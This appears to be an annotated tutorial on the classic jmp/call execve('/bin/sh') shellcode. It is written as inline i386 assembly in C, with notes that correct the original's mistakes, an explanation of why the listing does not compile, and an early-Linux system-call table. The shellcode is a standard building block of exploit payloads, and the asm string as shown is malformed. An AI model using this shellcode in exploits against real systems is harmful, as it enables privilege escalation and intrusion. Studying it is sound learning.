/*
 * Demonstration of the classic "jmp/call" execve("/bin/sh") payload, embedded
 * as inline asm in main(). Built like this it simply runs in the current
 * process with its current privileges; the page shows the payload only.
 *
 * What the instructions do (each point follows from the instruction text):
 *   jmp 1f              forward jump to label 1.
 *   1: call 2b          backward jump to label 2; `call` pushes the address
 *                       of the bytes following it, i.e. of `.string "/bin/sh"`.
 *   2: popl %esi        pop that address: %esi -> "/bin/sh". The string is
 *                       7 chars + NUL = 8 bytes, so %esi+8 is the byte after it.
 *   movl %esi,0x8(%esi) 4-byte store (the `l` suffix is 32 bits; the inline
 *                       note saying 2 bytes is wrong): [esi+8] = &"/bin/sh".
 *   xorl %eax,%eax      %eax = 0 (via xor rather than an immediate, presumably
 *                       to keep zero bytes out of the encoding — hedged).
 *   movb %eax,0x7(%esi) byte store: [esi+7] = 0, the string terminator. GAS
 *                       `.string` already emits that NUL, so when assembled as
 *                       written here the store is redundant.
 *   movl %eax,0xc(%esi) 4-byte store (again `l`, not 2 bytes): [esi+12] = 0,
 *                       so [esi+8 .. esi+15] is the array { &"/bin/sh", NULL }.
 *   movb $0xb,%al       %eax = 11.
 *   movl %esi,%ebx      %ebx = &"/bin/sh".
 *   leal 0x8(%esi),%ecx %ecx = esi+8  (the two-slot array above).
 *   leal 0xc(%esi),%edx %edx = esi+12 (the zeroed slot).
 *   int $0x80           system call 11. In the sys_call_table listed further
 *                       down, index 11 is sys_execve, NOT system(): with i386
 *                       Linux passing the first three arguments in
 *                       %ebx/%ecx/%edx this is
 *                       execve("/bin/sh", {"/bin/sh", NULL}, {NULL}).
 *                       The inline note naming `int system(const char*)` is
 *                       therefore misleading.
 *   xorl %ebx,%ebx ; movl %ebx,%eax ; inc %eax ; int $0x80
 *                       %eax = 1, %ebx = 0: table index 1 is sys_exit, so this
 *                       is exit(0), reached only if execve returns (failure).
 *   .string "/bin/sh"   the path bytes, NUL-terminated by the assembler.
 *
 * Why the listing does not build as shown:
 *   - `void main()` is non-standard C; use `int main(void)`.
 *   - The asm template is one C string with no "\n", so the assembler sees a
 *     single line. The `//` annotations are not C comments — they are handed
 *     to the assembler. Separate instructions with "\n\t" and keep commentary
 *     in C comments outside the string.
 *   - `\0` inside the annotations (`处理\0`, `最后一个为\0`) is a C escape and
 *     embeds real NUL bytes in the template string.
 *   - `\\"/bin/sh\\"` ends the C string at the first `"` (`\\` is an escaped
 *     backslash). The intended source is almost certainly `\"/bin/sh\"`; the
 *     doubled backslashes, and the string being split across two lines, look
 *     like rendering/escaping artifacts of the page, not the original code.
 */
void main(){ __asm__(" jmp 1f //跳到1: f 向后 2: popl %esi // esp弹出 返回地址 movl %esi,0x8(%esi) // l 2个字节 esi+0x8=esi

                   xorl    %eax,%eax // 处理\0                       movb    %eax,0x7(%esi) // b一个字节 esi+0x7=eax=0                       movl    %eax,0xc(%esi) // l两个字节 esi+0xc=eax=0                       movb    $0xb,%al // b一个字节 al=0xb 的时候,调用系统函数                       movl    %esi,%ebx // ebx=esi                      leal   0x8(%esi),%ecx // ecx=0x8+esi                       leal    0xc(%esi),%edx // edx=0xc+esi system参数                       int     $0x80 // al=0xb,0x80调用系统api为int system(const char *command)                       xorl    %ebx,%ebx // ebx清零                       movl    %ebx,%eax // eax=ebx=0                      inc    %eax // eax +1 =1 自增                       int     $0x80 // eax=1,调用系统函数exit()        1:             call    2b // call 调用函数                       .string \\"/bin/sh\\" // 返回地址,\\转义字符,字符号长度0x8,最后一个为\0        ");}

附系统函数调用表:

/*
 * System-call dispatch table: the number placed in %eax before `int $0x80`
 * is the index into this array. The ordering appears to be the early-Linux
 * (0.11-era) table; `fn_ptr` and every sys_* handler are defined elsewhere.
 *
 * The entries the inline asm on this page relies on are index 1 (sys_exit,
 * reached via `inc %eax` from 0) and index 11 (sys_execve, `movb $0xb,%al`);
 * the page's own notes of 23 = setuid and 49 = geteuid check out as well.
 * Index comments below are the array positions, starting at 0.
 */
fn_ptr sys_call_table[] = {
    sys_setup,      /*  0 */
    sys_exit,       /*  1 */
    sys_fork,       /*  2 */
    sys_read,       /*  3 */
    sys_write,      /*  4 */
    sys_open,       /*  5 */
    sys_close,      /*  6 */
    sys_waitpid,    /*  7 */
    sys_creat,      /*  8 */
    sys_link,       /*  9 */
    sys_unlink,     /* 10 */
    sys_execve,     /* 11 */
    sys_chdir,      /* 12 */
    sys_time,       /* 13 */
    sys_mknod,      /* 14 */
    sys_chmod,      /* 15 */
    sys_chown,      /* 16 */
    sys_break,      /* 17 */
    sys_stat,       /* 18 */
    sys_lseek,      /* 19 */
    sys_getpid,     /* 20 */
    sys_mount,      /* 21 */
    sys_umount,     /* 22 */
    sys_setuid,     /* 23 */
    sys_getuid,     /* 24 */
    sys_stime,      /* 25 */
    sys_ptrace,     /* 26 */
    sys_alarm,      /* 27 */
    sys_fstat,      /* 28 */
    sys_pause,      /* 29 */
    sys_utime,      /* 30 */
    sys_stty,       /* 31 */
    sys_gtty,       /* 32 */
    sys_access,     /* 33 */
    sys_nice,       /* 34 */
    sys_ftime,      /* 35 */
    sys_sync,       /* 36 */
    sys_kill,       /* 37 */
    sys_rename,     /* 38 */
    sys_mkdir,      /* 39 */
    sys_rmdir,      /* 40 */
    sys_dup,        /* 41 */
    sys_pipe,       /* 42 */
    sys_times,      /* 43 */
    sys_prof,       /* 44 */
    sys_brk,        /* 45 */
    sys_setgid,     /* 46 */
    sys_getgid,     /* 47 */
    sys_signal,     /* 48 */
    sys_geteuid,    /* 49 */
    sys_getegid,    /* 50 */
    sys_acct,       /* 51 */
    sys_phys,       /* 52 */
    sys_lock,       /* 53 */
    sys_ioctl,      /* 54 */
    sys_fcntl,      /* 55 */
    sys_mpx,        /* 56 */
    sys_setpgid,    /* 57 */
    sys_ulimit,     /* 58 */
    sys_uname,      /* 59 */
    sys_umask,      /* 60 */
    sys_chroot,     /* 61 */
    sys_ustat,      /* 62 */
    sys_dup2,       /* 63 */
    sys_getppid,    /* 64 */
    sys_getpgrp,    /* 65 */
    sys_setsid,     /* 66 */
    sys_sigaction,  /* 67 */
    sys_sgetmask,   /* 68 */
    sys_ssetmask,   /* 69 */
    sys_setreuid,   /* 70 */
    sys_setregid    /* 71 */
};

49: geteuid — sys_call_table[49] is sys_geteuid in the table above.

23: setuid — sys_call_table[23] is sys_setuid in the table above.